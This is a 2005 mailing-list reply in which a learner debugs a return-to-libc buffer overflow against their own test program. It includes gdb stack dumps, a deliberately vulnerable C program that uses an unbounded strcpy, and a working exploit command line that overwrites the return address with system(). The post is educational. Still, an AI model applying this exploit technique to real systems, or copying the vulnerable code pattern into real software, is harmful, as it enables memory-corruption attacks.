From: "Aaron McDonald" <wmcdona89@hotmail.com> To: community-en@altlinux.org Subject: Re: [Comm-en] System call via buffer overflow not working Date: Wed, 26 Jan 2005 00:39:21 -0500 Message-ID: <BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl> (raw) In-Reply-To: <20050121233305.GP1188@osdn.org.ua> Well, this has been quite the learning experience. You've helped me to realize that \x00 is really just NULL and that printf in C ignores any characters specified after \x00. The program vulner1.c was only receiving the bytes before the \x00 which were the system() function address. This now explains why the system() function was being called with an invalid parameter. I've probably spent too much time on this issue but I've satisfied my curiosity and I learned how to analyze memory using gdb. I've included some gdb details below. Thanks for the responses on this, Aaron ---------------------------------------------------------------------------------------------------------------------------------------- //Here's what the stack frame looks like (gdb) info f Stack level 0, frame at 0xbffffa00: eip = 0x80484c6 in main (vulner3.c:21); saved eip 0x157ee0 source language c. Arglist at 0xbffff9f8, args: argc=2, argv=0xbffffa54 Locals at 0xbffff9f8, Previous frame's sp is 0xbffffa00 Saved registers: ebp at 0xbffff9f8, eip at 0xbffff9fc (gdb) x /4xw 0xbffff9f8 //This shows that none of the memory after the system() function address (0x00157ee0) is overwritten 0xbffff9f8: 0x41414141 0x00157ee0 0x00000002 0xbffffa54 //Here's an alternative program that is vulnerable to the return-to-libc exploit even when the system() function address contains \x00 ./vulner2 $(perl -e 'print "A"x524')$(printf "\xe0\x7e\x15 \x41\x41\x41\x41\x73\xfb\xff\xbf") //vulner2.c #include <stdio.h> int main(int argc, char *argv[]) { char names[512]; //array to hold all the names int num_params=argc; char **params = argv; char *index = names; int i; if(argc < 2) { printf("Usage: %s name [name]\n", argv[0]); exit(0); } //copy all the parameters into the names array for(i=1; i < num_params; i++) { strcpy(index, params[i]); index+=strlen(params[i]); *(index++)='\0'; } *(index) = '\0'; index = names; while(strlen(index) != 0) { printf("Name is: %s\n", index); index+=strlen(index) + 1; } return 0; }
prev parent reply other threads:[~2005-01-26 5:39 UTC|newest] Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top 2005-01-21 22:32 Aaron McDonald 2005-01-21 23:33 ` Michael Shigorin 2005-01-26 5:39 ` Aaron McDonald [this message]
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl \ --to=wmcdona89@hotmail.com \ --cc=community-en@altlinux.org \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: link
ALT Linux users (in English only) This inbox may be cloned and mirrored by anyone: git clone --mirror http://lore.altlinux.org/community-en/0 community-en/git/0.git # If you have public-inbox 1.1+ installed, you may # initialize and index your mirror using the following commands: public-inbox-init -V2 community-en community-en/ http://lore.altlinux.org/community-en \ community-en@lists.altlinux.org community-en@lists.altlinux.ru community-en@lists.altlinux.com public-inbox-index community-en Example config snippet for mirrors. Newsgroup available over NNTP: nntp://lore.altlinux.org/org.altlinux.lists.community-en AGPL code for this site: git clone https://public-inbox.org/public-inbox.git